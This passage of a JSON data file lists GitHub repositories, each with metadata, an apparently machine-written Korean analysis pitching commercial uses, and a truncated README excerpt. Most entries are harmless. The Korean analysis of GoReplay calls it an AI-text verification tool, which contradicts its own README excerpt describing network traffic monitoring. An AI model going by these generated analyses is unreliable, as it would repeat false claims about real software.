[!","composite_score":0.194,"license_safety_tag":"unknown"},{"name":"phillbush/pomod","github_url":"https://github.com/phillbush/pomod","stars":7,"language":"C","license":"unknown","abandonment_months":10,"description":"# phillbush/pomod 분석\n\n## 왜 보물인가\n일상적인 업무 생산성 향상을 위한 간단하고 가벼운 작업 시간 관리 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **생산성 앱 SaaS**: 뽀모도로 기법(집중-휴식 반복) 기반 웹/모바일 구독 서비스로 출시\n2. **기업 내부 도구**: 직원들의 집중력 관리와 시간 추적을 위한 회사 업무 대시보드 통","readme_excerpt":"POMOD(1)                         X Notes                        POMOD(1)\n\nNAME\n       pomod - pomodoro daemon\n\nSYNOPSIS\n       pomod [-S socket] [-l time] [-p time] [-s time]\n       pomo [-S socket] [start|stop|info]\n\nDESCRIPTION\n       pomod is a timer daemon that implements the pomodoro technique.\n       The pomod command is the server; it times pomodoro and break\n       cycles while waiting for commands from the client.  The pomo\n       command is the client; it send commands to the server for\n       controling the timer.\n\n       When called, the pomod command begins with the timer stopped and\n       waits for the client to start it.  Once started, it begins a\n       pomodoro.  After a pomodoro, a break begins.  After each four\n       pomodoros, the break is a long break, otherwise it is a short\n       break.  By default, a pomodoro lasts 25 minutes; a short break\n       lasts 5 minutes and a long break lasts 30 minutes.  When the\n       cycle changes (from a pomodoro to a short bre","composite_score":0.194,"license_safety_tag":"unknown"},{"name":"joppuyo/acf-image-aspect-ratio-crop","github_url":"https://github.com/joppuyo/acf-image-aspect-ratio-crop","stars":14,"language":"PHP","license":"GPL-2.0","abandonment_months":8,"description":"# ACF 이미지 종횡비 자르기 도구 분석\n\n## 왜 보물인가\nWordPress의 인기 있는 플러그인(ACF)과 연동하여 웹사이트 이미지를 자동으로 최적의 크기로 정렬해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **WordPress 호스팅 SaaS**: 이 기능을 자체 호스팅 플랫폼에 내장하여 사용자가 이미지를 쉽게 관리하도록 돕는 프리미엄 기능으로","readme_excerpt":"# ACF Image Aspect Ratio Crop Field\n\n[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/joppuyo/acf-image-aspect-ratio-crop/main.yml?branch=master&logo=github)](https://github.com/joppuyo/acf-image-aspect-ratio-crop/actions/workflows/main.yml)\n[![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/joppuyo/acf-image-aspect-ratio-crop/test.yml?branch=master&label=tests&logo=github)](https://github.com/joppuyo/acf-image-aspect-ratio-crop/actions/workflows/test.yml)\n[![WordPress plugin](https://img.shields.io/wordpress/plugin/v/acf-image-aspect-ratio-crop?logo=wordpress)](https://wordpress.org/plugins/acf-image-aspect-ratio-crop/)\n[![WordPress Plugin Active Installs](https://img.shields.io/wordpress/plugin/installs/acf-image-aspect-ratio-crop?logo=wordpress)](https://wordpress.org/plugins/acf-image-aspect-ratio-crop/)\n[![WordPress Plugin Rating](https://img.shields.io/wordpress/plugin/stars/acf-image-aspect-ratio-crop?logo=wordpress)]","composite_score":0.1937,"license_safety_tag":"restricted"},{"name":"coffe1891/frontend-hard-mode-interview","github_url":"https://github.com/coffe1891/frontend-hard-mode-interview","stars":10,"language":"JavaScript","license":"NOASSERTION","abandonment_months":9,"description":"# coffe1891/frontend-hard-mode-interview 평가\n\n## 왜 보물인가\n웹사이트 개발 면접에서 실제로 나오는 어려운 문제들을 모아둔 학습 자료로, 개발자 채용 교육 시장에서 필요한 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **개발 인재 채용 서비스**: 기업의 개발자 면접 문제 은행으로 제공하거나 면접 평가 기준 설정에 활용","readme_excerpt":"# 前端内参\n\n[![&#x652F;&#x6301;&#x6211;](https://img.shields.io/github/stars/coffe1891/frontend-hard-mode-interview?style=social)](https://github.com/coffe1891/frontend-hard-mode-interview/)\n\n![&#x5C01;&#x9762;](https://tva1.sinaimg.cn/large/007S8ZIlgy1gfyj8fmwm1j30zk0hs770.jpg)\n\n【阅 读 本 书】[https://coffe1891.gitbook.io/frontend-hard-mode-interview](https://coffe1891.gitbook.io/frontend-hard-mode-interview/)  \n【讨论本书】[https://github.com/coffe1891/frontend-hard-mode-interview/discussions](https://github.com/coffe1891/frontend-hard-mode-interview/discussions)  \n【作者微信】GZKXS1891（请注明\"前端内参\"）  \n【QQ交流群】308689488（也可以扫上图二维码）\n\n如果觉得有帮助请点右上角的**Star**支持我不断更新。\n\n> 1. 本书较多着笔于深层理论上的论述，辅有代码示例，适合至少三年前端工作经验的朋友阅读。\n> 2. 尽量访问上面的GitBook地址，导航更清晰，图片也不会出现显示错位，并且支持手机模式。\n> 3. 如果书里文章的图片显示不了，开启科学上网工具、多刷几遍就好。\n\n前端技术日新月异，我也在不断学习，因此疏漏之处在所难免，欢迎朋友随时[@提建议](https://github.com/coffe1891/frontend-hard-mode-interview/discussions)，我将及时改进。\n\n## 前言\n\n如何在Hard模式下通过一线互联网公司的面试？相信很多程序员朋友都有过这个困扰。其实答案很简单：**首先应努力成为一个好程序员，然后入职一线互联网公司只是顺路的事**。\n\n然后有前","composite_score":0.1935,"license_safety_tag":"unknown"},{"name":"sorin-ionescu/prezto","github_url":"https://github.com/sorin-ionescu/prezto","stars":6,"language":"Shell","license":"mit","abandonment_months":1,"description":"# Prezto 저장소 분석\n\n## 왜 보물인가\n컴퓨터 터미널(검은 화면)을 더 빠르고 편하게 사용하도록 도와주는 도구로, 개발자들의 일일 생산성을 크게 향상시킵니다.\n\n## 어디에 쓸 수 있나\n\n1. **개발 팀 온보딩 솔루션**: 신입 개발자들이 공통된 터미널 환경을 빠르게 설정하도록 지원하는 SaaS 플랫폼\n2. **기업 IT 배포 도구**: 대규모 ","readme_excerpt":"# Prezto — Instantly Awesome Zsh\n\nPrezto is the configuration framework for [Zsh][1]; it enriches the command line\ninterface environment with sane defaults, aliases, functions, auto completion,\nand prompt themes.\n\n## Installation\n\n### Manual\n\nPrezto will work with any recent release of Zsh, but the minimum required\nversion is **4.3.11**.\n\n01. Launch Zsh:\n\n    ```console\n    zsh\n    ```\n\n02. Clone the repository:\n\n    ```console\n    git clone --recursive https://github.com/sorin-ionescu/prezto.git \"${ZDOTDIR:-$HOME}/.zprezto\"\n    ```\n\n    <details>\n      <summary><em>Optional: Installing in <code>$XDG_CONFIG_HOME</code></em></summary>\n\n      Optionally, if you already have `$XDG_CONFIG_HOME` configured (usually as\n      _`$HOME/.config`_ by default) and intend to install Prezto under\n      _`$XDG_CONFIG_HOME/zsh`_ instead, you can clone the repository there and\n      configure `$ZDOTDIR` separately if not already configured.\n\n      - Clone the repository:\n\n        ```console\n        git","composite_score":0.1933,"license_safety_tag":"safe"},{"name":"indradb/indradb","github_url":"https://github.com/indradb/indradb","stars":5,"language":"Rust","license":"MPL-2.0","abandonment_months":9,"description":"# IndraDB 상용화 분석\n\n## 왜 보물인가\n복잡한 관계 데이터를 매우 빠르게 저장하고 검색할 수 있는 전문 데이터베이스로, 대규모 네트워크 분석이 필요한 기업들에게 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **추천 엔진 SaaS**: 전자상거래·SNS 플랫폼의 \"당신이 좋아할 만한 상품/사람\" 추천 기능을 고속으로 처리하는 백엔드 서비스\n","readme_excerpt":"<p align=\"center\">\n \t<img src=\"https://indradb.github.io/logo.png\">\n</p>\n\n# [IndraDB](https://indradb.github.io)\n\n[![Test](https://github.com/indradb/indradb/actions/workflows/test.yml/badge.svg)](https://github.com/indradb/indradb/actions/workflows/test.yml)\n[![crates.io](https://img.shields.io/crates/v/indradb-lib.svg)](https://crates.io/crates/indradb-lib)\n[![Released API docs](https://docs.rs/indradb-lib/badge.svg)](https://docs.rs/indradb-lib)\n\nA graph database written in rust.\n\nIndraDB consists of a server and an underlying library. Most users would use the server, which is available via releases as pre-compiled binaries. But if you're a rust developer that wants to embed a graph database directly in your application, you can use the [library](https://github.com/indradb/indradb/tree/master/lib).\n\nIndraDB's original design was heavily inspired by [TAO](https://www.cs.cmu.edu/~pavlo/courses/fall2013/static/papers/11730-atc13-bronson.pdf), facebook's graph datastore. In particular, ","composite_score":0.1924,"license_safety_tag":"unknown"},{"name":"resumejob/awesome-resume","github_url":"https://github.com/resumejob/awesome-resume","stars":6,"language":"","license":"unknown","abandonment_months":8,"description":"# awesome-resume 저장소 분석\n\n## 왜 보물인가\n이력서를 멋지게 만드는 템플릿과 팁을 모아놓은 자료집으로, 취업을 준비하는 사람들이 전문가처럼 보이는 이력서를 쉽게 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 클라우드 기반 이력서 생성 플랫폼 (기업 맞춤형 템플릿 자동 추천 기능)\n2. **내부 업무 도구**","readme_excerpt":"<h1 align=\"center\">\n Awesome Resume\n</h1>\n<h4 align=\"center\">\n 专业地道的简历例句，包括个人简介，项目介绍以及 Cover Letter\n</h4>\n\n\n<h4 align=\"center\">\n  <a href=\"https://osjobs.net/co/\">\n    海外兔小班教学帮助你高效准备面试，学员大厂率超过 65%，入职不成功不收费。\n  </a>\n</h4>\n\n\n| 其他热门项目     | 链接 |\n| ----------- | ----------- |\n| 免费项目实战课程   | <a href=\"https://github.com/resumejob/free-project-course\">https://github.com/resumejob/free-project-course/</a>        |\n| 算法面试前冲刺      | <a href=\"https://nlogk.osjobs.net/\">https://nlogk.osjobs.net/</a>      |\n| 高频面试题      | <a href=\"https://osjobs.net/topk/\">https://osjobs.net/topk/</a>      |\n\n### 目录\n\n- [Checklist](#checklist)\n- [English](#English)\n\t- [Summary](#summary)\n\t- [Work Experience](#work-experience)\n   - [Referral](#referral)\n\t- [Cover Letter](#cover-letter)\n- [中文](#中文)\n    - [简介](#简介)\n    - [项目经验](#项目经验)\n\n\n\n## <a name=\"checklist\">Checklist</a>\n- [ ] 按照时间倒序列出工作经历以及项目经验\n- [ ] 检查电话与邮箱地址是否正确，领英与简历同步更新\n- [ ] 使用前后一致的字体，行距与文字间距\n- [ ] 使用 Grammarly 或其他语法检查工具检查拼写\n- [ ] 使用 PDF 格式并且保持一页篇幅，简历命名方式为 “姓名_","composite_score":0.192,"license_safety_tag":"unknown"},{"name":"iliakan/javascript-tutorial-en","github_url":"https://github.com/iliakan/javascript-tutorial-en","stars":15,"language":"HTML","license":"NOASSERTION","abandonment_months":3,"description":"# JavaScript 튜토리얼 저장소 분석\n\n## 왜 보물인가\n웹 개발의 기초인 자바스크립트를 체계적으로 배울 수 있는 완성된 교육 자료로, 프로그래밍 입문자부터 실무자까지 신뢰할 수 있는 학습 가이드입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 학원 SaaS**: 기존 튜토리얼을 한국어로 현지화하여 월 구독형 학습 플랫폼으로 운영\n2. **기","readme_excerpt":"# The Modern JavaScript Tutorial\n\nThis repository hosts the English content of the Modern JavaScript Tutorial, published at [https://javascript.info](https://javascript.info).\n\n## Translations\n\nWe'd like to make the tutorial available in many languages. Please help us to translate.\n\nSee <https://javascript.info/translate> for the details.\n\n## Contributions\n\nWe'd also like to collaborate on the tutorial with other people.\n\nSomething's wrong? A topic is missing? Explain it to people, add it as PR 👏\n\n**You can edit the text in any editor.** The tutorial uses an enhanced \"markdown\" format, easy to grasp. And if you want to see how it looks on-site, there's a server to run the tutorial locally at <https://github.com/javascript-tutorial/server>.\n\nThe list of contributors is available at <https://javascript.info/about#contributors>.\n\n## Structure\n\nEvery chapter, article, or task has its folder.\n\nThe folder is named like `N-url`, where `N` is a number for the sorting purposes and `URL` is the ","composite_score":0.1918,"license_safety_tag":"unknown"},{"name":"joelparkerhenderson/architecture_decision_record","github_url":"https://github.com/joelparkerhenderson/architecture_decision_record","stars":5,"language":"","license":"NOASSERTION","abandonment_months":0,"description":"# Architecture Decision Record (ADR) 저장소 분석\n\n## 왜 보물인가\n회사의 중요한 기술 결정 과정을 체계적으로 기록하고 관리할 수 있는 표준화된 템플릿으로, 직원들 간 의사소통 혼란을 줄이고 나중에 왜 그 결정을 했는지 명확히 알 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기업용 문서 관리 ","readme_excerpt":"<!--\n  browser: architecture-decision-record\n  tracker: 2bd6622ec3beeeddd8ff55cf0ccf2efc\n  version: 3.2.0\n  updated: 2025-05-29T14:13:27Z\n  contact: Joel Parker Henderson (http://joelparkerhenderson.com)\n  options: commentable\n  summary: Architecture Decision Record (ADR) for software planning, CTO/CIO leadership teamwork, and project management documentation. Examples, templates, and tutorials.\n  tags: architecturedecisionrecord adr decisionrecord projectmanagement plan cto cio leadership teamwork documentation template tutorial architecture decision record\n-->\n\n# Architecture decision record (ADR)\n\nAn architecture decision record (ADR) is a document that captures an important architecture decision made along with its context and consequences.\n\nContents:\n\n- [What is an architecture decision record?](#what-is-an-architecture-decision-record)\n- [How to start using ADRs](#how-to-start-using-adrs)\n- [How to start using ADRs with tools](#how-to-start-using-adrs-with-tools)\n- [How to start ","composite_score":0.1915,"license_safety_tag":"unknown"},{"name":"AllThingsSmitty/jquery-tips-everyone-should-know","github_url":"https://github.com/AllThingsSmitty/jquery-tips-everyone-should-know","stars":6,"language":"","license":"cc0-1.0","abandonment_months":14,"description":"# AllThingsSmitty/jquery-tips-everyone-should-know 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 자주 사용하는 jQuery 기능을 쉽게 배울 수 있는 실용적인 팁 모음입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 개발 교육 플랫폼**: 초급 개발자 대상 온라인 강좌 콘텐츠로 활용하여 구독료 모델 운영\n2.","readme_excerpt":"# jQuery Tips Everyone Should Know [![Awesome](https://awesome.re/badge-flat.svg)](https://awesome.re)\n\nA collection of simple tips to help up your jQuery game.\n\n> [!TIP]\n> For other great lists check out [@sindresorhus](https://github.com/sindresorhus/)'s curated list of [awesome lists](https://github.com/sindresorhus/awesome/).\n\n## Table of Contents\n\n- [Tips](#tips)\n- [Support](#support)\n- [Translations](#translations)\n- [Contribution Guidelines](CONTRIBUTING.md)\n\n## Tips\n\n1. [Use `noConflict()`](#use-noconflict)\n1. [Checking If jQuery Loaded](#checking-if-jquery-loaded)\n1. [Check Whether an Element Exists](#check-whether-an-element-exists)\n1. [Use `.on()` Binding Instead of `.click()`](#use-on-binding-instead-of-click)\n1. [Back to Top Button](#back-to-top-button)\n1. [Preload Images](#preload-images)\n1. [Checking If Images Are Loaded](#checking-if-images-are-loaded)\n1. [Fix Broken Images Automatically](#fix-broken-images-automatically)\n1. [Post a Form with AJAX](#post-a-form-with-aja","composite_score":0.1914,"license_safety_tag":"unknown"},{"name":"fofapro/vulfocus","github_url":"https://github.com/fofapro/vulfocus","stars":7,"language":"Vue","license":"Apache-2.0","abandonment_months":9,"description":"# Vulfocus 사업화 분석\n\n## 왜 보물인가\n보안 취약점을 안전하게 연습하고 학습할 수 있는 실습 환경을 제공하여, 기업의 보안 인력 양성 비용을 크게 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 기업 직원 대상 온라인 보안 교육 플랫폼으로, 월별 사용자 수에 따라 구독료 청구\n- **내부 업무 도구**: 보안 관제팀","readme_excerpt":"<h1 align=\"center\"> Welcome to Vulfocus 🚀 </h1>\n\nVulfocus 是一个漏洞集成平台，将漏洞环境 docker 镜像，放入即可使用，开箱即用。\n\n<p>\n  <img src=\"https://img.shields.io/github/stars/fofapro/vulfocus.svg?style=flat-square\" />\n  <img src=\"https://img.shields.io/github/release/fofapro/vulfocus.svg?style=flat-square\" />\n  <img src=\"https://img.shields.io/github/release/fofapro/vulfocus.svg?color=blue&label=update&style=flat-square\" />\n  <img src=\"https://img.shields.io/github/license/fofapro/vulfocus?style=flat-square\" />\n  <!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n<img src=\"https://img.shields.io/badge/all_contributors-24-orange.svg?style=flat-square\" />\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n</p>\n\nVulfocus 官网：[https://fofapro.github.io/vulfocus/](https://fofapro.github.io/vulfocus/)\n\n在线 Vulfocus：\n\n[https://vulfocus.cn/](https://vulfocus.cn/)\n\n\n## 背景\n\n漏洞靶场是目前每个安全人员以及想学习信息安全的人必备的东西，但目前商业化产品居多，还有一些类似 dvwa、 sqli-labs 这类的开源项目，但是漏洞环境比较固定，使用完一次后就失去其作用。搭建的成本过高，每次启动的流程会比较繁琐，甚至很多场景是不满足的，之前关于漏洞环境镜像","composite_score":0.1913,"license_safety_tag":"safe"},{"name":"v2tec/watchtower","github_url":"https://github.com/v2tec/watchtower","stars":6,"language":"Go","license":"apache-2.0","abandonment_months":5,"description":"# Watchtower 저장소 분석\n\n## 왜 보물인가\n컴퓨터의 소프트웨어가 자동으로 최신 버전으로 업데이트되도록 감시하고 관리해주는 도구로, 보안 취약점을 빠르게 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 인프라 관리 SaaS**: 기업의 서버를 자동으로 감시해 필요한 업데이트를 실행하는 구독 서비스\n2. **IT 운영팀 내부 도구","readme_excerpt":"<div align=\"center\">\n\n  ### ⚠️ This project is no longer maintained\n  See https://github.com/containrrr/watchtower/discussions/2135 for details.\n\n  ---\n  \n  <img src=\"./logo.png\" width=\"450\" />\n  \n  # Watchtower\n  \n  A process for automating Docker container base image updates.\n  <br/><br/>\n  \n  [![Circle CI](https://circleci.com/gh/containrrr/watchtower.svg?style=shield)](https://circleci.com/gh/containrrr/watchtower)\n  [![codecov](https://codecov.io/gh/containrrr/watchtower/branch/main/graph/badge.svg)](https://codecov.io/gh/containrrr/watchtower)\n  [![GoDoc](https://godoc.org/github.com/containrrr/watchtower?status.svg)](https://godoc.org/github.com/containrrr/watchtower)\n  [![Go Report Card](https://goreportcard.com/badge/github.com/containrrr/watchtower)](https://goreportcard.com/report/github.com/containrrr/watchtower)\n  [![latest version](https://img.shields.io/github/tag/containrrr/watchtower.svg)](https://github.com/containrrr/watchtower/releases)\n  [![Apache-2.0 License](http","composite_score":0.1912,"license_safety_tag":"safe"},{"name":"wix/Detox","github_url":"https://github.com/wix/Detox","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":0,"description":"# Wix/Detox 분석 보고서\n\n## 왜 보물인가\n모바일 앱을 만드는 회사들이 앱이 제대로 작동하는지 자동으로 검사해주는 도구로, 버그를 조기에 발견해 품질을 보장할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 SaaS**: 스타트업 개발사들이 구독료를 내고 자신들의 앱 품질 검사를 자동화\n2. **대기업 내부 업무 도구**: 은행","readme_excerpt":"<!-- markdownlint-configure-file { \"first-line-heading\": 0 } -->\n\n[![SWUbanner](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner-direct.svg)](https://stand-with-ukraine.pp.ua)\n\n<p align=\"center\">\n  <img alt=\"Detox\" width=380 src=\"https://raw.githubusercontent.com/wix/Detox/master/docs/img/DetoxLogo.png\"/>\n</p>\n<h1 align=\"center\">\n  Detox\n</h1>\n<p align=\"center\">\n<b>Gray box end-to-end testing and automation framework for mobile apps.</b>\n</p>\n<p align=\"center\">\n<img alt=\"Demo\" src=\"docs/img/Detox.gif\"/>\n</p>\n<h1></h1>\n\n<img src=\"https://user-images.githubusercontent.com/1962469/89655670-1c235c80-d8d3-11ea-9320-0f865767ef5d.png\" alt=\"\" height=24 width=1> [![NPM Version](https://img.shields.io/npm/v/detox.svg?style=flat)](https://www.npmjs.com/package/detox) [![NPM Downloads](https://img.shields.io/npm/dm/detox.svg?style=flat)](https://www.npmjs.com/package/detox) [![Build status](https://badge.buildkite.com/39afde30a964a6763de9753762bc80264ba141e1c1f41fc878.svg","composite_score":0.1908,"license_safety_tag":"safe"},{"name":"jomei/notionapi","github_url":"https://github.com/jomei/notionapi","stars":59,"language":"Go","license":"BSD-2-Clause","abandonment_months":9,"description":"# jomei/notionapi 상용화 분석\n\n## 왜 보물인가\nNotion이라는 인기 있는 업무 도구와 연결하여 자동화된 데이터 관리 시스템을 만들 수 있는 기술이기 때문입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 회사의 프로젝트 관리를 Notion과 자동으로 연동하여 데이터를 실시간으로 동기화하는 업무 효율화 서비스\n2. **내부","readme_excerpt":"# notionapi\n\n[![GitHub tag (latest SemVer)](https://img.shields.io/github/v/tag/jomei/notionapi?label=go%20module)](https://github.com/jomei/notionapi/tags)\n[![Go Reference](https://pkg.go.dev/badge/github.com/jomei/notionapi.svg)](https://pkg.go.dev/github.com/jomei/notionapi)\n[![Test](https://github.com/jomei/notionapi/actions/workflows/test.yml/badge.svg)](https://github.com/jomei/notionapi/actions/workflows/test.yml)\n\nThis is a Golang implementation of an API client for the [Notion API](https://developers.notion.com/).\n\n## Supported APIs\n\nIt supports all APIs of the Notion API version `2022-06-28`.\n\n## Installation\n\n```bash\ngo get github.com/jomei/notionapi\n```\n\n## Usage\n\nFirst, please follow the [Getting Started Guide](https://developers.notion.com/docs/getting-started) to obtain an integration token.\n\n### Initialization\n\nImport this library and initialize the API client using the obtained integration token.\n\n```go\nimport \"github.com/jomei/notionapi\"\n\nclient := notionapi.NewClient","composite_score":0.1903,"license_safety_tag":"safe"},{"name":"mholt/caddy","github_url":"https://github.com/mholt/caddy","stars":10,"language":"Go","license":"apache-2.0","abandonment_months":0,"description":"# Caddy 저장소 분석\n\n## 왜 보물인가\n웹사이트를 인터넷에 연결하는 필수 중간 소프트웨어(웹 서버)를 간단하게 설정할 수 있도록 만들어서, 전 세계 수많은 개발자와 회사들이 매일 사용하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 자동으로 보안 인증서를 갱신해주는 기능을 이용해 고객사별 웹사이트 호스팅 플랫폼을 구축하고 월","readme_excerpt":"<p align=\"center\">\n\t<a href=\"https://caddyserver.com\">\n\t\t<picture>\n\t\t\t<source media=\"(prefers-color-scheme: dark)\" srcset=\"https://user-images.githubusercontent.com/1128849/210187358-e2c39003-9a5e-4dd5-a783-6deb6483ee72.svg\">\n\t\t\t<source media=\"(prefers-color-scheme: light)\" srcset=\"https://user-images.githubusercontent.com/1128849/210187356-dfb7f1c5-ac2e-43aa-bb23-fc014280ae1f.svg\">\n\t\t\t<img src=\"https://user-images.githubusercontent.com/1128849/210187356-dfb7f1c5-ac2e-43aa-bb23-fc014280ae1f.svg\" alt=\"Caddy\" width=\"550\">\n\t\t</picture>\n\t</a>\n\t<br>\n\t<h3 align=\"center\">a <a href=\"https://zerossl.com\"><img src=\"https://user-images.githubusercontent.com/55066419/208327323-2770dc16-ec09-43a0-9035-c5b872c2ad7f.svg\" height=\"28\" style=\"vertical-align: -7.7px\" valign=\"middle\"></a> project</h3>\n</p>\n<hr>\n<h3 align=\"center\">Every site on HTTPS</h3>\n<p align=\"center\">Caddy is an extensible server platform that uses TLS by default.</p>\n<p align=\"center\">\n\t<a href=\"https://github.com/caddyserver/caddy/","composite_score":0.1901,"license_safety_tag":"safe"},{"name":"top-think/think","github_url":"https://github.com/top-think/think","stars":8,"language":"PHP","license":"NOASSERTION","abandonment_months":10,"description":"# top-think/think 저장소 분석\n\n## 왜 보물인가\n저장소 이름과 설명 정보가 부족해 정확한 가치 판단이 어렵지만, 8개의 관심(Stars)과 활발한 개발(최근 커밋: 2025-07-16)을 보면 누군가는 이 기술이 유용하다고 판단하고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 중소기업의 사원들이 일상적으로 사용할 수 ","readme_excerpt":"![](https://www.thinkphp.cn/uploads/images/20230630/300c856765af4d8ae758c503185f8739.png)\r\n\r\nThinkPHP 8\r\n===============\r\n\r\n## 特性\r\n\r\n* 基于PHP`8.0+`重构\r\n* 升级`PSR`依赖\r\n* 依赖`think-orm`3.0+版本\r\n* 全新的`think-dumper`服务，支持远程调试\r\n* 支持`6.0`/`6.1`无缝升级\r\n\r\n> ThinkPHP8的运行环境要求PHP8.0+\r\n\r\n现在开始，你可以使用官方提供的[ThinkChat](https://chat.topthink.com/)，让你在学习ThinkPHP的旅途中享受私人AI助理服务！\r\n\r\n![](https://www.topthink.com/uploads/assistant/20230630/4d1a3f0ad2958b49bb8189b7ef824cb0.png)\r\n\r\nThinkPHP生态服务由[顶想云](https://www.topthink.com)（TOPThink Cloud）提供，为生态提供专业的开发者服务和价值之选。\r\n\r\n## 文档\r\n\r\n[完全开发手册](https://doc.thinkphp.cn)\r\n\r\n\r\n## 赞助\r\n\r\n全新的[赞助计划](https://www.thinkphp.cn/sponsor)可以让你通过我们的网站、手册、欢迎页及GIT仓库获得巨大曝光，同时提升企业的品牌声誉，也更好保障ThinkPHP的可持续发展。\r\n\r\n[![](https://www.thinkphp.cn/sponsor/special.svg)](https://www.thinkphp.cn/sponsor/special)\r\n\r\n[![](https://www.thinkphp.cn/sponsor.svg)](https://www.thinkphp.cn/sponsor)\r\n\r\n## 安装\r\n\r\n~~~\r\ncomposer create-project topthink/think tp\r\n~~~\r\n\r\n启动服务\r\n\r\n~~~\r\ncd tp\r\nphp think run\r\n~~~\r\n\r\n然后就可以在浏览器中访问\r\n\r\n","composite_score":0.1901,"license_safety_tag":"unknown"},{"name":"YunaiV/onemall","github_url":"https://github.com/YunaiV/onemall","stars":6,"language":"Java","license":"MIT","abandonment_months":0,"description":"# YunaiV/onemall 분석 리포트\n\n## 왜 보물인가\n작은 온라인 쇼핑몰을 만들거나 운영하고 싶은 사람들이 직접 사용할 수 있도록 만들어진 완성된 쇼핑몰 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: \"누구나 쉽게 자신의 온라인 쇼핑몰을 만들 수 있는 플랫폼\"으로 제공하여 매달 이용료를 받기\n2. **내부 업무 도구**: ","readme_excerpt":"<p align=\"center\">\n <img src=\"https://img.shields.io/badge/Spring%20Cloud-2021-blue.svg\" alt=\"Coverage Status\">\n <img src=\"https://img.shields.io/badge/Spring%20Boot-2.7.18-blue.svg\" alt=\"Downloads\">\n <img src=\"https://img.shields.io/badge/Vue-3.2-blue.svg\" alt=\"Downloads\">\n <img src=\"https://img.shields.io/github/license/YunaiV/yudao-cloud\" alt=\"Downloads\" />\n</p>\n\n**严肃声明：现在、未来都不会有商业版本，所有代码全部开源!！**\n\n**「我喜欢写代码，乐此不疲」**  \n**「我喜欢做开源，以此为乐」**\n\n我 🐶 在上海艰苦奋斗，早中晚在 top3 大厂认真搬砖，夜里为开源做贡献。\n\n如果这个项目让你有所收获，记得 Star 关注哦，这对我是非常不错的鼓励与支持。\n\n可参考 [《迁移文档》](https://cloud.iocoder.cn/migrate-module/) ，只需要 5-10 分钟，即可将【完整版】按需迁移到【精简版】\n\n## 🐶 新手必读\n\n* 演示地址【Vue3 + element-plus】：<http://dashboard-vue3.yudao.iocoder.cn>\n* 演示地址【Vue3 + vben(ant-design-vue)】：<http://dashboard-vben.yudao.iocoder.cn>\n* 演示地址【Vue2 + element-ui】：<http://dashboard.yudao.iocoder.cn>\n* 启动文档：<https://cloud.iocoder.cn/quick-start/>\n* 视频教程：<https://cloud.iocoder.cn/video/>\n\n## 🐰 版本说明\n\n| 版本                                                                ","composite_score":0.19,"license_safety_tag":"safe"},{"name":"buger/goreplay","github_url":"https://github.com/buger/goreplay","stars":11,"language":"Go","license":"NOASSERTION","abandonment_months":4,"description":"# buger/goreplay 분석 보고서\n\n## 왜 보물인가\nAI가 생성한 텍스트가 실제로 맞는지 자동으로 검증하는 기술로, 거짓 정보 문제를 근본적으로 해결할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **AI 챗봇 서비스**: 고객 상담 챗봇이 잘못된 답변을 주지 않도록 자동 검사하는 SaaS 상품\n2. **언론사 자동화 도구**: 기사 작성 AI","readme_excerpt":"<a href=\"https://semgrep.dev/login?utm_source=github&utm_medium=badge&utm_campaign=growth-oss\"><img src=\"https://img.shields.io/badge/semgrep-security-green.svg\" /></a> [![GitHub release](https://img.shields.io/github/release/buger/gor.svg?maxAge=3600)](https://github.com/buger/goreplay/releases) [![codebeat](https://codebeat.co/badges/6427d589-a78e-416c-a546-d299b4089893)](https://codebeat.co/projects/github-com-buger-gor) [![Go Report Card](https://goreportcard.com/badge/github.com/buger/gor)](https://goreportcard.com/report/github.com/buger/gor) [![Join the chat at https://gitter.im/buger/gor](https://badges.gitter.im/buger/gor.svg)](https://gitter.im/buger/gor?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge) [![Reviewed by Hound](https://img.shields.io/badge/Reviewed_by-Hound-8E64B0.svg)](https://houndci.com)\n\n![Go Replay](http://i.imgur.com/ZG2ki5n.png)\n\n## https://goreplay.org/\n\nGoReplay is an open-source network monitoring tool which can record your liv","composite_score":0.1898,"license_safety_tag":"unknown"},{"name":"RedisAI/RedisAI","github_url":"https://github.com/RedisAI/RedisAI","stars":7,"language":"C","license":"NOASSERTION","abandonment_months":9,"description":"# RedisAI 프로젝트 분석\n\n## 왜 보물인가\n복잡한 데이터 분석을 빠르게 처리하는 기술로, 대량의 정보를 실시간으로 다루는 기업들이 매우 필요로 하는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 행동 분석, 추천 상품 제안 등을 실시간으로 제공하는 플랫폼\n- **내부 업무 도구**: 대규모 판매 데이터를 즉시 분석해 경","readme_excerpt":"> [!CAUTION]\n> **Redis-inference-optimization is no longer actively maintained or supported.**\n>\n> We are grateful to the redis-inference-optimization community for their interest and support.\n> Previously, redis-inference-optimization was named RedisAI, but was renamed in Jan 2025 to reduce confusion around Redis' other AI offerings. To learn more about Redis' current AI offerings, visit [the Redis website](https://redis.io/redis-for-ai).\n\n# Redis-inference-optimization\nRedis-inference-optimization is a Redis module for executing Deep Learning/Machine Learning models and managing their data. 